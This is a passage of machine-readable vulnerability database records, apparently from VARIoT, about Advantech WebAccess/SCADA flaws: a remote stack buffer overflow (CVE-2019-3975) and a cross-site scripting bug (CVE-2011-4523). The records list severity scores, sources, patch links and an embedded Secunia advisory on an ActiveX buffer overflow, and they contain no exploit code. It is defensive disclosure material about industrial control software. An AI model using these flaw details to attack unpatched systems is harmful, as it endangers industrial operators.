"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3975", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-3975", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32466", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201909-431", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-155410", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "VULHUB", "id": "VHN-155410" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNNVD", "id": "CNNVD-201909-431" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.1 allows a remote, unauthenticated attacker to execute arbitrary code via a crafted IOCTL 70603 RPC message. Advantech WebAccess/SCADA Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer error vulnerability exists in Advantech WebAccess/SCADA version 8.4.1. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc", "sources": [ { "db": "NVD", "id": "CVE-2019-3975" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "VULHUB", "id": "VHN-155410" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3975", "trust": 3.3 }, { "db": "TENABLE", "id": "TRA-2019-41", "trust": 2.5 }, { "db": "CNNVD", "id": "CNNVD-201909-431", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32466", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-009167", "trust": 0.8 }, { "db": "IVD", "id": "6779568D-C80F-445B-BA8E-FA61163D09AD", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155410", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "VULHUB", "id": "VHN-155410" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNNVD", "id": "CNNVD-201909-431" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "id": "VAR-201909-0221", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "VULHUB", "id": "VHN-155410" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" } ] }, "last_update_date": "2024-11-23T22:41:21.068000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-32466)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181499" }, { "title": "Advantech WebAccess/SCADA Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98025" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNNVD", "id": "CNNVD-201909-431" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.0 }, { "problemtype": "CWE-120", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155410" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://www.tenable.com/security/research/tra-2019-41" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3975" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3975" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "VULHUB", "id": "VHN-155410" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNNVD", "id": "CNNVD-201909-431" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "VULHUB", "id": "VHN-155410" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "CNNVD", "id": "CNNVD-201909-431" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32466" }, { "date": "2019-09-10T00:00:00", "db": "VULHUB", "id": "VHN-155410" }, { "date": "2019-09-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "date": "2019-09-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-431" }, { "date": "2019-09-10T16:15:12.667000", "db": "NVD", "id": "CVE-2019-3975" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32466" }, { "date": "2019-09-11T00:00:00", "db": "VULHUB", "id": "VHN-155410" }, { "date": "2019-09-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "date": "2021-07-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-431" }, { "date": "2024-11-21T04:42:59.290000", "db": "NVD", "id": "CVE-2019-3975" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-431" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess/SCADA Vulnerable to classic buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009167" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNNVD", "id": "CNNVD-201909-431" } ], "trust": 0.8 } }
var-201202-0037
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in bwview.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess bwview.asp lacks filtering on parameters leading to cross-site scripting attacks. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0037", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "CNNVD", "id": "CNNVD-201202-403" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001547" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4523", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2011-4523", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "1aba788a-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-52468", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4523", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2011-4523", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-403", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-52468", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52468" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "CNNVD", "id": "CNNVD-201202-403" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site scripting (XSS) vulnerability in bwview.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess bwview.asp lacks filtering on parameters leading to cross-site scripting attacks. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4523" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52468" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4523", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-403", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0658", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001547", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1ABA788A-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52468", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "VULHUB", "id": "VHN-52468" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-403" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "id": "VAR-201202-0037", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "VULHUB", "id": "VHN-52468" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0658" } ] }, "last_update_date": "2024-11-23T21:46:31.159000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Cross-Site Scripting Vulnerability (CNVD-2012-0658)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10151" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52468" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4523" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4523" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": 